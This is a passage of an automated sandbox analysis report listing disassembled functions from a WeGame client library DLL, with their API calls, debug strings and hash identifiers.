                                        • API ID: U?$char_traits@$D@std@@@std@@$??1?$basic_ios@D@std@@V?$allocator@$?get_log_instance@base@@D@2@@4@@D@2@@std@@@std@@@std@@H_prolog3Logger@1@V?$basic_istringstream@V?$basic_streambuf@V?$basic_string@V?$optional@V?$reference_wrapper@$??0?$basic_ios@??0?$basic_istream@??6?$basic_ostream@?decode_stream@common@ierd_tgp@@?decode_string@common@ierd_tgp@@D@std@@@1@@D@std@@@1@_D@std@@@4@H_prolog3_H_prolog3_catch_V01@V?$basic_istream@
                                        • String ID: [cfg_file_model]file not exist, path:%s$[cfg_mgr][cfg_file]decode failed, path:%s$d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp
                                        • API String ID: 149814805-1166739837
                                        • Opcode ID: 64c57bb88bdad2b7b48acb9d80cc95b7bc6abb94a59282070bffcf3b1f9a1d46
                                        • Instruction ID: 245218c96e36f4f9f9349bd17cd1a4b8411fa94a9007718bca4365227a23640b
                                        • Opcode Fuzzy Hash: 64c57bb88bdad2b7b48acb9d80cc95b7bc6abb94a59282070bffcf3b1f9a1d46
                                        • Instruction Fuzzy Hash: F551BF31941248EEDB24DBA4CD54BDEBBF89F1A308F2400D8E14477681EB75AF49CB62
                                        Function 6C172006 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C172010
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C1720D2
                                          • Part of subcall function 6C1039CE: __EH_prolog3_GS.LIBCMT ref: 6C1039D5
                                          • Part of subcall function 6C1039CE: ?parent_path_end@path@filesystem@ierd_tgp@@ABEIXZ.COMMON(00000024,6C102156,?,?), ref: 6C1039E7
                                        • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C1720E1
                                          • Part of subcall function 6C1029BB: __EH_prolog3_GS.LIBCMT ref: 6C1029C2
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C1720F3
                                          • Part of subcall function 6C0BFACF: __EH_prolog3.LIBCMT ref: 6C0BFAD6
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C172150
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C17215F
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C17216E
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C1721B8
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,000000A0,rail_files,?,?,?,000000A0,tcls,00000000,?,000000A0,?,6C3FA750,parent node is null), ref: 6C1721CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: V123@$?parent_path@path@filesystem@ierd_tgp@@$?wstring@path@filesystem@ierd_tgp@@H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$?filename@path@filesystem@ierd_tgp@@?parent_path_end@path@filesystem@ierd_tgp@@H_prolog3memmove
                                        • String ID: child node not found, node name:$parent node is null$rail_files$tcls
                                        • API String ID: 1466240017-3856246967
                                        • Opcode ID: b572eb3f6e8c12b5c382d8385639a2c352d88fa19d79e6483eb4b1437b00e5de
                                        • Instruction ID: 4001379c64d4e5d9da68d98c499eca26d40e9a73c439d2283be55a97290f333e
                                        • Opcode Fuzzy Hash: b572eb3f6e8c12b5c382d8385639a2c352d88fa19d79e6483eb4b1437b00e5de
                                        • Instruction Fuzzy Hash: C8515770901288DACF19DFE8C894BDDFBB4AF25308F94419DD046B7681EB746B48CB62
                                        Function 6C0C6EA1 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • _Copy_construct_from.LIBCPMT ref: 6C0C6F26
                                        • ?send_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,00000064), ref: 6C0C6F34
                                          • Part of subcall function 6C0F565B: __EH_prolog3_GS.LIBCMT ref: 6C0F5665
                                          • Part of subcall function 6C0C4FB8: __EH_prolog3.LIBCMT ref: 6C0C4FBF
                                        • _Copy_construct_from.LIBCPMT ref: 6C0C6F73
                                        • ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@_N@Z.COMMON(?,?,?,?,00000000), ref: 6C0C6F81
                                        • GetTickCount.KERNEL32 ref: 6C0C6F99
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0C6FA8
                                        Strings
                                        • [wegame_quit][step1]exit_app:{}., xrefs: 6C0C6ED2
                                        • d:\ci_dev\wegame_client\codes\common\src\app.cpp, xrefs: 6C0C6EBA, 6C0C6FCC
                                        • [wegame_quit][step2]exit_app, will_count_:{}, xrefs: 6C0C6FEA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Copy_construct_fromH_prolog3V?$shared_ptr@$?get_log_instance@base@@?post_msg@@?send_msg@@CountH_prolog3_Logger@1@TickUmsg_base@@@std@@@Umsg_base@@@std@@_
                                        • String ID: [wegame_quit][step1]exit_app:{}.$[wegame_quit][step2]exit_app, will_count_:{}$d:\ci_dev\wegame_client\codes\common\src\app.cpp
                                        • API String ID: 101891664-2733568639
                                        • Opcode ID: 1fa3ea6f67a5f1d953377cf9a28fca6197018070e22d8eb0153b67a62732c668
                                        • Instruction ID: 226c3683dc595200ebb72618508e9dbb9882ba4066921b79fdd502bd7e1c3737
                                        • Opcode Fuzzy Hash: 1fa3ea6f67a5f1d953377cf9a28fca6197018070e22d8eb0153b67a62732c668
                                        • Instruction Fuzzy Hash: B4419F70A01304EBDB19DFA8C954BAD77F4AF15308F20844DD445AB781DB75AE09CBA2
                                        Function 6C0DE15A Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0DE161
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054,6C0DE0FA,?,?), ref: 6C0DE17F
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054,6C0DE0FA,?,?), ref: 6C0DE1E1
                                        • EnterCriticalSection.KERNEL32(?,00000054,6C0DE0FA,?,?), ref: 6C0DE24C
                                        • ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00000054), ref: 6C0DE27D
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000054), ref: 6C0DE288
                                        Strings
                                        • SendData error, data size:%u too large, xrefs: 6C0DE1C2
                                        • SendData %ws size=%u, xrefs: 6C0DE229
                                        • d:\ci_dev\wegame_client\codes\common\src\base_named_pipe.cpp, xrefs: 6C0DE1AB, 6C0DE207
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@CriticalLogger@1@Section$EnterH_prolog3H_prolog3_H_prolog3_catch_LeaveReleaseSemaphore
                                        • String ID: SendData %ws size=%u$SendData error, data size:%u too large$d:\ci_dev\wegame_client\codes\common\src\base_named_pipe.cpp
                                        • API String ID: 2292408840-2360317330
                                        • Opcode ID: 8d8c9b37c907ce668343f7d938a670ae38be6954e1a50be80e7038ece1078a24
                                        • Instruction ID: 02b472a1cd42ba9f2d8bde9c9351385b0c57a71f50fb33daf32d2a08b2c466fb
                                        • Opcode Fuzzy Hash: 8d8c9b37c907ce668343f7d938a670ae38be6954e1a50be80e7038ece1078a24
                                        • Instruction Fuzzy Hash: 4B31B130901645ABDB04DFA4CC95BEEB7E9AF11348F214158F9516BA80DB35BE09CBD1
                                        Function 6C15E421 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15E428
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,0000006C), ref: 6C15E450
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,0000006C), ref: 6C15E45B
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 6C15E4C2
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15E487, 6C15E4F8
                                        • [Sys_wrapper]Failed to convert path for open file mgr, xrefs: 6C15E49B
                                        • open, xrefs: 6C15E4BC
                                        • [Sys_wrapper]Failed to call ShellExecute for %s, ret=%d, xrefs: 6C15E518
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$?get_log_instance@base@@?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@ExecuteH_prolog3H_prolog3_catch_Logger@1@ShellU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@4@@W@std@@
                                        • String ID: [Sys_wrapper]Failed to call ShellExecute for %s, ret=%d$[Sys_wrapper]Failed to convert path for open file mgr$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp$open
                                        • API String ID: 1549429978-1288889083
                                        • Opcode ID: b2ae1c169f89c1251e564126cced441dc0beaac085a0c01676e87929af344b4d
                                        • Instruction ID: d2426dba6efd85be795649f1439eda0ed8fc592f11558c1fdf95506de0c60113
                                        • Opcode Fuzzy Hash: b2ae1c169f89c1251e564126cced441dc0beaac085a0c01676e87929af344b4d
                                        • Instruction Fuzzy Hash: 3431A4B5941604EBDB10DFA4C841BDE77B49F15318F641058E511BB680E739EF48CF91
                                        Function 6C0CE025 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 84networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0CE02C
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 6C0CE044
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0CE052
                                          • Part of subcall function 6C0CE3EA: closesocket.WS2_32(000000FF), ref: 6C0CE3F6
                                        • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 6C0CE0BA
                                        • WSAGetLastError.WS2_32 ref: 6C0CE0C2
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0CE0CF
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\asy_udp.cpp, xrefs: 6C0CE073, 6C0CE0F0
                                        • [common][Asy_udp] sock(%d) set sock not block failed, ret=%d, err=%d., xrefs: 6C0CE10D
                                        • [common][Asy_udp] socket create failed., xrefs: 6C0CE08F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$ErrorH_prolog3_Lastclosesocketioctlsocketsocket
                                        • String ID: [common][Asy_udp] sock(%d) set sock not block failed, ret=%d, err=%d.$[common][Asy_udp] socket create failed.$d:\ci_dev\wegame_client\codes\common\src\asy_udp.cpp
                                        • API String ID: 1916031119-2745274173
                                        • Opcode ID: 6bd53e5efe462d5cde74863ff554afe79e6df2735cb4063ada1d15f93d6a1d1a
                                        • Instruction ID: 8bb3e6c78d262145ddce4e6dfc0a36d9e65fdc88190f6e8dca5d9420ec7c8e0a
                                        • Opcode Fuzzy Hash: 6bd53e5efe462d5cde74863ff554afe79e6df2735cb4063ada1d15f93d6a1d1a
                                        • Instruction Fuzzy Hash: C121E4B0B11710ABDB149BB48C5AF9D33E16F41728F204754E5307BAC0EB76A949CEC1
                                        Function 6C15A9D5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15A9DF
                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000258,6C150748,?,00000050), ref: 6C15A9E8
                                        • memset.VCRUNTIME140(?,00000000,00000200), ref: 6C15AA1F
                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,00000002,?,00000000,00000200), ref: 6C15AA33
                                        • GetDriveTypeW.KERNEL32(?), ref: 6C15AA43
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C15AA53
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15AA77
                                        • [Sys_wrapper]path is not fixed_remote, xrefs: 6C15AA8E
                                        • C:\, xrefs: 6C15A9FB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@DriveH_prolog3_Logger@1@Typememsetwcslenwcsncpy_s
                                        • String ID: C:\$[Sys_wrapper]path is not fixed_remote$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 3729441984-3503112580
                                        • Opcode ID: c1315841848a541addad2cce5a946224e339e7db4cba3b99e5a48a4441ba0a8d
                                        • Instruction ID: 5d850536a37509bdd5f201bf36c38be6279a701327079dca8b6ee360af529b69
                                        • Opcode Fuzzy Hash: c1315841848a541addad2cce5a946224e339e7db4cba3b99e5a48a4441ba0a8d
                                        • Instruction Fuzzy Hash: D511BBB1A41218A7CF20DB648C49BDD73789B15708F500585F525BB6C0DB799AC9CFA1
                                        Function 6C146F83 Relevance: 15.3, APIs: 10, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C146F8D
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                        • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP140(00000000,00000000,00000002), ref: 6C147031
                                        • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3CE62F), ref: 6C147040
                                        • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP140(00000000,00000000,00000000), ref: 6C147064
                                        • ?eof@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3CE62F,00000000), ref: 6C147071
                                        • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP140(?,?,00000000), ref: 6C147096
                                        • ?eof@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,6C3CE62F,00000000,000000F8), ref: 6C1471A0
                                        • ?ToHex@common@ierd_tgp@@YAEABE@Z.COMMON(?), ref: 6C14720B
                                        • ?ToHex@common@ierd_tgp@@YAEABE@Z.COMMON(?,00000001,?), ref: 6C14723A
                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,6C3CE62F,00000000,000000F8), ref: 6C147273
                                          • Part of subcall function 6C146AD4: __EH_prolog3.LIBCMT ref: 6C146ADB
                                          • Part of subcall function 6C1477A2: __EH_prolog3_GS.LIBCMT ref: 6C1477AC
                                          • Part of subcall function 6C1477A2: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,?,?,?,?,6C3CE62F,00000000,000000F8), ref: 6C14783E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?eof@ios_base@std@@?seekg@?$basic_istream@H_prolog3_Hex@common@ierd_tgp@@V12@_$??1?$basic_ios@?read@?$basic_istream@?tellg@?$basic_istream@H_prolog3Mbstatet@@@2@V12@V?$fpos@memmovetolower
                                        • String ID:
                                        • API String ID: 334280407-0
                                        • Opcode ID: 1146f33b9a7dcff1881be4935f7b9e33bc20d783865c67e2c41f1e8e399db02b
                                        • Instruction ID: 90925e8d5b220b169f1ccd75707fd7d87f5d421124f6c8fc299942efa70445c4
                                        • Opcode Fuzzy Hash: 1146f33b9a7dcff1881be4935f7b9e33bc20d783865c67e2c41f1e8e399db02b
                                        • Instruction Fuzzy Hash: 64C13A71D05258DFDF24CFA4C894BDDBBB5AF18304F1080EAE509A7682DB346A89CF61
                                        Function 6C0AFD30 Relevance: 15.3, APIs: 10, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6C0AFDFA
                                        • memset.VCRUNTIME140(00000010,?,00000000,00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6C0AFE08
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,0000000F), ref: 6C0AFE4B
                                        • memmove.VCRUNTIME140(00000000,?,00000000,?,00000000,0000000F), ref: 6C0AFE53
                                        • memset.VCRUNTIME140(7FFFFFFF,?,00000000,00000000,?,00000000,?,00000000,0000000F), ref: 6C0AFE5F
                                          • Part of subcall function 6C1C2E95: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C0B621D,0000002C,0000000C,6C0B5702,00000004,6C0B57B1,00000214), ref: 6C1C2EAA
                                        • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 6C0AFF43
                                        • memmove.VCRUNTIME140(00000010,00000000,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 6C0AFF51
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 6C0AFF94
                                        • memmove.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 6C0AFF9C
                                        • memmove.VCRUNTIME140(7FFFFFFF,00000000,?,00000000,?,00000000,?,00000000), ref: 6C0AFFA8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturnmemset$malloc
                                        • String ID:
                                        • API String ID: 1092852243-0
                                        • Opcode ID: e0758959250c72c9ef18175b31f96ef01abb245fbf12346721d1890c2f35635e
                                        • Instruction ID: 77f40c84aa19217b8840c259e442b65b2f40c0a80539618c6dbdd205cb25cdd4
                                        • Opcode Fuzzy Hash: e0758959250c72c9ef18175b31f96ef01abb245fbf12346721d1890c2f35635e
                                        • Instruction Fuzzy Hash: 1781E472A011149FDB05DFECDC80A9EB7EAEF89355B10426AE805DB742D730DE128BD2
                                        Function 6C30FC40 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 176stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strstr.VCRUNTIME140(?,://,00000000,00000000,?,?,?,?,00000020,?,000000FF,?,00000080,?,000000FF,00000000), ref: 6C30FC55
                                        • memmove.VCRUNTIME140(?,?,00000000,?,?,?,?,00000020,?,000000FF,?,00000080,?,000000FF,00000000), ref: 6C30FC73
                                        • strchr.VCRUNTIME140(?,0000003F,?,?,?,?,00000020,?,000000FF,?,00000080,?,000000FF,00000000), ref: 6C30FC8E
                                        • memmove.VCRUNTIME140(00000001,?,?,?,?,?,?,?,?,00000020,?,000000FF,?,00000080,?,000000FF), ref: 6C30FCD9
                                        • strchr.VCRUNTIME140(-00000001,00000026,?,?,?,?,?,?,00000020,?,000000FF,?,00000080,?,000000FF,00000000), ref: 6C30FD13
                                        • memchr.VCRUNTIME140(-00000001,0000003D,00000000,?,?,?,?,?,?,?,?,00000020,?,000000FF,?,00000080), ref: 6C30FD47
                                        • memmove.VCRUNTIME140(-00000094,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 6C30FD9C
                                        • memmove.VCRUNTIME140(-000000B4,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000020,?), ref: 6C30FDDC
